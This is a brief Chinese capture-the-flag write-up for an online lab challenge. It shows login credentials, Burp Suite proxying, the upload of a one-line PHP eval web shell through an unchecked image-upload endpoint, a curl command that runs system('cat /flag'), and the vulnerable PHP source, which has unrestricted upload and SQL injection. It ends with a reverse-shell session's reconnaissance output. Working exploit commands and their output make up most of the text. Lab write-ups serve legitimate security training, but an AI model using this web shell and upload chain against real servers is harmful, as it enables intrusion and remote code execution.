登录界面的密码是(虽然用不着登录):
email:[email protected]
passwd:mayurik
开bp (BurpSuite) ,默认代理tcp 8080:
curl -v -x http://127.0.0.1:8080/ http://eci-2ze2eis9aefyejwfnape.cloudeci1.ichunqiu.com/login.php
C:\Users\Administrator>type z:\999.php
<?=eval($_POST[9]);
C:\Users\Administrator>
curl -v -F "productImage=@z:/999.php" -F "btn=1" -x http://127.0.0.1:8080/ http://eci-2ze2eis9aefyejwfnape.cloudeci1.ichunqiu.com/php_action/editProductImage.php?id=1
get flag:
curl -v -d "9=system('cat /flag');" http://eci-2ze2eis9aefyejwfnape.cloudeci1.ichunqiu.com/assets/myimages/999.php
flag{027c354b-32db-449e-a92f-0f9e3472bf8c}
/var/www/html/php_action/editProductImage.php
<?php
require_once 'core.php';
//$valid['success'] = array('success' => false, 'messages' => array());
$productId = $_GET['id'];
if($_POST) {
$image = $_FILES['productImage']['name'];
$target = "../assets/myimages/".basename($image);
if (move_uploaded_file($_FILES['productImage']['tmp_name'], $target)) {
// @unlink("uploadImage/Profile/".$_POST['old_image']);
//echo $_FILES['image']['tmp_name'];
//cho $target;exit;
$msg = "Image uploaded successfully";
echo $msg;
}
else{
$msg = "Failed to upload image";
echo $msg;exit;
}
$sql = "UPDATE product SET product_image = '$image' WHERE product_id = $productId";
//echo $sql;exit;
if($connect->query($sql) === TRUE) {
$valid['success'] = true;
$valid['messages'] = "Successfully Updated";
header('location:../product.php');
}
else {
$valid['success'] = false;
$valid['messages'] = "Error while updating product image";
}
// /else
$connect->close();
echo json_encode($valid);
} // /if $_POST
?>
反弹一个shell:
www-data@engine-2:/tmp$ uname -a
Linux engine-2 4.19.91-20220519040629.182dd72.al7.x86_64 #1 SMP Thu May 19 04:09:16 UTC 2022 x86_64 GNU/Linux
www-data@engine-2:/tmp$
www-data@engine-2:/tmp$ curl cip.cc
IP : 39.106.20.178
地址 : 中国 北京
运营商 : 阿里云/电信/联通/移动/铁通/教育网
数据二 : 北京市 | 阿里云
数据三 : 中国北京北京市 | 阿里云
URL : http://www.cip.cc/39.106.20.178
www-data@engine-2:/tmp$
www-data@engine-2:/tmp$ df -h
Filesystem Size Used Avail Use% Mounted on
overlay 30G 9.0G 20G 33% /
tmpfs 64M 0 64M 0% /dev
tmpfs 336M 0 336M 0% /sys/fs/cgroup
/dev/vda 30G 56M 28G 1% /etc/hosts
kataShared 19G 14G 4.0G 78% /etc/resolv.conf
shm 63M 0 63M 0% /dev/shm
www-data@engine-2:/tmp$ free -m
total used free shared buff/cache available
Mem: 670 165 114 0 391 435
Swap: 0 0 0
www-data@engine-2:/tmp$
www-data@engine-2:/tmp$ php -v
PHP 7.2.20 (cli) (built: Jul 12 2019 23:33:38) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies
www-data@engine-2:/tmp$